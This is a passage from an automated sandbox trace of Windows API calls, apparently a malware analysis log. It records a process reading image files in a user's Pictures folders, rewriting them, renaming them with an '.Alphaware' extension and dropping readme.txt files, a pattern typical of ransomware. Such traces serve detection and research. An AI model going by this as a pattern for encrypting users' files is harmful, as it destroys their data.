returned 0xcd54 [0086.192] ReadFile (in: hFile=0x254, lpBuffer=0x25b6c20, nNumberOfBytesToRead=0xcd54, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25b6c20*, lpNumberOfBytesRead=0x23e958*=0xcd54, lpOverlapped=0x0) returned 1 [0086.204] CloseHandle (hObject=0x254) returned 1 [0086.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.231] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\upx6uzdipr.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.232] GetFileType (hFile=0x254) returned 0x1 [0086.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.232] GetFileType (hFile=0x254) returned 0x1 [0086.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\upx6uzdipr.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1446550, ftCreationTime.dwHighDateTime=0x1d972c3, ftLastAccessTime.dwLowDateTime=0x959b0770, ftLastAccessTime.dwHighDateTime=0x1d97557, ftLastWriteTime.dwLowDateTime=0x859890e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x112a0)) returned 1 [0086.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.235] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\upx6uzdipr.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\uPx6uzdIPR.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\upx6uzdipr.gif.alphaware")) returned 1 [0086.236] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png", dwFileAttributes=0x80) returned 1 [0086.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.236] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\zr 1jjinh15qprebog.png"), fInfoLevelId=0x0, lpFileInformation=0x2473518 | out: lpFileInformation=0x2473518*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80e02460, ftCreationTime.dwHighDateTime=0x1d966bf, ftLastAccessTime.dwLowDateTime=0x65e77f50, ftLastAccessTime.dwHighDateTime=0x1d9751a, ftLastWriteTime.dwLowDateTime=0x65e77f50, ftLastWriteTime.dwHighDateTime=0x1d9751a, nFileSizeHigh=0x0, nFileSizeLow=0xe650)) returned 1 [0086.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.236] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\zr 1jjinh15qprebog.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.237] GetFileType (hFile=0x254) returned 0x1 [0086.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.237] GetFileType (hFile=0x254) returned 0x1 [0086.237] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0xe650 [0086.237] ReadFile (in: hFile=0x254, lpBuffer=0x2473820, nNumberOfBytesToRead=0xe650, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2473820*, lpNumberOfBytesRead=0x23e958*=0xe650, lpOverlapped=0x0) returned 1 [0086.238] CloseHandle (hObject=0x254) returned 1 [0086.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.257] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\zr 1jjinh15qprebog.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.258] GetFileType (hFile=0x254) returned 0x1 [0086.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.258] GetFileType (hFile=0x254) returned 0x1 [0086.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\zr 1jjinh15qprebog.png"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e02460, ftCreationTime.dwHighDateTime=0x1d966bf, ftLastAccessTime.dwLowDateTime=0x65e77f50, ftLastAccessTime.dwHighDateTime=0x1d9751a, ftLastWriteTime.dwLowDateTime=0x859d53a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x133f4)) returned 1 [0086.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.261] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\zr 1jjinh15qprebog.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\AZ80w8eAVF6qLdtcVJI\\zR 1JJINH15QPReboG.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\az80w8eavf6qldtcvji\\zr 1jjinh15qprebog.png.alphaware")) returned 1 [0086.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.262] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd43b2920, ftCreationTime.dwHighDateTime=0x1d96728, ftLastAccessTime.dwLowDateTime=0x859d53a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x859d53a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.262] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97d1cb0, ftCreationTime.dwHighDateTime=0x1d970c1, ftLastAccessTime.dwLowDateTime=0xb1426890, ftLastAccessTime.dwHighDateTime=0x1d971bc, ftLastWriteTime.dwLowDateTime=0x85916cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x83e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="r5bauI Uaurz 0kBPe.jpg.Alphaware", cAlternateFileName="R5BAUI~1.ALP")) returned 1 [0086.262] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85916cc0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85916cc0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85916cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.262] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1446550, ftCreationTime.dwHighDateTime=0x1d972c3, ftLastAccessTime.dwLowDateTime=0x959b0770, ftLastAccessTime.dwHighDateTime=0x1d97557, ftLastWriteTime.dwLowDateTime=0x859890e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x112a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uPx6uzdIPR.gif.Alphaware", cAlternateFileName="UPX6UZ~1.ALP")) returned 1 [0086.262] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e02460, ftCreationTime.dwHighDateTime=0x1d966bf, ftLastAccessTime.dwLowDateTime=0x65e77f50, ftLastAccessTime.dwHighDateTime=0x1d9751a, ftLastWriteTime.dwLowDateTime=0x859d53a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x133f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="zR 1JJINH15QPReboG.png.Alphaware", cAlternateFileName="ZR1JJI~1.ALP")) returned 1 [0086.262] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e02460, ftCreationTime.dwHighDateTime=0x1d966bf, ftLastAccessTime.dwLowDateTime=0x65e77f50, ftLastAccessTime.dwHighDateTime=0x1d9751a, ftLastWriteTime.dwLowDateTime=0x859d53a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x133f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="zR 1JJINH15QPReboG.png.Alphaware", cAlternateFileName="ZR1JJI~1.ALP")) returned 0 [0086.262] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.263] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0301a0, ftCreationTime.dwHighDateTime=0x1d966f6, ftLastAccessTime.dwLowDateTime=0x618e9fb0, ftLastAccessTime.dwHighDateTime=0x1d96e7b, ftLastWriteTime.dwLowDateTime=0x618e9fb0, ftLastWriteTime.dwHighDateTime=0x1d96e7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.263] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0707850, ftCreationTime.dwHighDateTime=0x1d9701d, ftLastAccessTime.dwLowDateTime=0xc1c22b40, ftLastAccessTime.dwHighDateTime=0x1d97425, ftLastWriteTime.dwLowDateTime=0xc1c22b40, ftLastWriteTime.dwHighDateTime=0x1d97425, nFileSizeHigh=0x0, nFileSizeLow=0x658e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Oehl_lcMAlFB_Z.gif", cAlternateFileName="5OEHL_~1.GIF")) returned 1 [0086.263] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24607f30, ftCreationTime.dwHighDateTime=0x1d97062, ftLastAccessTime.dwLowDateTime=0x6a0c1d10, ftLastAccessTime.dwHighDateTime=0x1d97188, ftLastWriteTime.dwLowDateTime=0x6a0c1d10, ftLastWriteTime.dwHighDateTime=0x1d97188, nFileSizeHigh=0x0, nFileSizeLow=0x1385e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATmiRxTquKvSIqb.png", cAlternateFileName="ATMIRX~1.PNG")) returned 1 [0086.263] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3ca3f90, ftCreationTime.dwHighDateTime=0x1d96f85, ftLastAccessTime.dwLowDateTime=0xea0aa8b0, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xea0aa8b0, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vmOQizT54", cAlternateFileName="VMOQIZ~1")) returned 1 [0086.263] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3ca3f90, ftCreationTime.dwHighDateTime=0x1d96f85, ftLastAccessTime.dwLowDateTime=0xea0aa8b0, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xea0aa8b0, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vmOQizT54", cAlternateFileName="VMOQIZ~1")) returned 0 [0086.263] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.263] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif", dwFileAttributes=0x80) returned 1 [0086.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.264] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\5oehl_lcmalfb_z.gif"), fInfoLevelId=0x0, lpFileInformation=0x252c358 | out: lpFileInformation=0x252c358*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe0707850, ftCreationTime.dwHighDateTime=0x1d9701d, ftLastAccessTime.dwLowDateTime=0xc1c22b40, ftLastAccessTime.dwHighDateTime=0x1d97425, ftLastWriteTime.dwLowDateTime=0xc1c22b40, ftLastWriteTime.dwHighDateTime=0x1d97425, nFileSizeHigh=0x0, nFileSizeLow=0x658e)) returned 1 [0086.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.264] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\5oehl_lcmalfb_z.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.264] GetFileType (hFile=0x254) returned 0x1 [0086.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.264] GetFileType (hFile=0x254) returned 0x1 [0086.264] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x658e [0086.265] ReadFile (in: hFile=0x254, lpBuffer=0x252c620, nNumberOfBytesToRead=0x658e, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x252c620*, lpNumberOfBytesRead=0x23e958*=0x658e, lpOverlapped=0x0) returned 1 [0086.266] CloseHandle (hObject=0x254) returned 1 [0086.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.296] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\5oehl_lcmalfb_z.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.297] GetFileType (hFile=0x254) returned 0x1 [0086.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.297] GetFileType (hFile=0x254) returned 0x1 [0086.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.300] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\5oehl_lcmalfb_z.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0707850, ftCreationTime.dwHighDateTime=0x1d9701d, ftLastAccessTime.dwLowDateTime=0xc1c22b40, ftLastAccessTime.dwHighDateTime=0x1d97425, ftLastWriteTime.dwLowDateTime=0x85a21660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8834)) returned 1 [0086.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.300] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\5oehl_lcmalfb_z.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\5Oehl_lcMAlFB_Z.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\5oehl_lcmalfb_z.gif.alphaware")) returned 1 [0086.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0086.300] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.301] GetFileType (hFile=0x254) returned 0x1 [0086.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0086.301] GetFileType (hFile=0x254) returned 0x1 [0086.302] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png", dwFileAttributes=0x80) returned 1 [0086.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.302] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\atmirxtqukvsiqb.png"), fInfoLevelId=0x0, lpFileInformation=0x2405930 | out: lpFileInformation=0x2405930*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x24607f30, ftCreationTime.dwHighDateTime=0x1d97062, ftLastAccessTime.dwLowDateTime=0x6a0c1d10, ftLastAccessTime.dwHighDateTime=0x1d97188, ftLastWriteTime.dwLowDateTime=0x6a0c1d10, ftLastWriteTime.dwHighDateTime=0x1d97188, nFileSizeHigh=0x0, nFileSizeLow=0x1385e)) returned 1 [0086.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.303] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\atmirxtqukvsiqb.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.303] GetFileType (hFile=0x254) returned 0x1 [0086.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.303] GetFileType (hFile=0x254) returned 0x1 [0086.303] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x1385e [0086.303] ReadFile (in: hFile=0x254, lpBuffer=0x2405bf8, nNumberOfBytesToRead=0x1385e, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2405bf8*, lpNumberOfBytesRead=0x23e958*=0x1385e, lpOverlapped=0x0) returned 1 [0086.305] CloseHandle (hObject=0x254) returned 1 [0086.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.334] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\atmirxtqukvsiqb.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.335] GetFileType (hFile=0x254) returned 0x1 [0086.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.335] GetFileType (hFile=0x254) returned 0x1 [0086.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.339] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\atmirxtqukvsiqb.png"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24607f30, ftCreationTime.dwHighDateTime=0x1d97062, ftLastAccessTime.dwLowDateTime=0x6a0c1d10, ftLastAccessTime.dwHighDateTime=0x1d97188, ftLastWriteTime.dwLowDateTime=0x85a93a80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a148)) returned 1 [0086.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.339] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\atmirxtqukvsiqb.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\ATmiRxTquKvSIqb.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\atmirxtqukvsiqb.png.alphaware")) returned 1 [0086.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0301a0, ftCreationTime.dwHighDateTime=0x1d966f6, ftLastAccessTime.dwLowDateTime=0x85a93a80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85a93a80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0707850, ftCreationTime.dwHighDateTime=0x1d9701d, ftLastAccessTime.dwLowDateTime=0xc1c22b40, ftLastAccessTime.dwHighDateTime=0x1d97425, ftLastWriteTime.dwLowDateTime=0x85a21660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8834, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Oehl_lcMAlFB_Z.gif.Alphaware", cAlternateFileName="5OEHL_~1.ALP")) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24607f30, ftCreationTime.dwHighDateTime=0x1d97062, ftLastAccessTime.dwLowDateTime=0x6a0c1d10, ftLastAccessTime.dwHighDateTime=0x1d97188, ftLastWriteTime.dwLowDateTime=0x85a93a80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a148, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATmiRxTquKvSIqb.png.Alphaware", cAlternateFileName="ATMIRX~1.ALP")) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a21660, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85a21660, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85a21660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3ca3f90, ftCreationTime.dwHighDateTime=0x1d96f85, 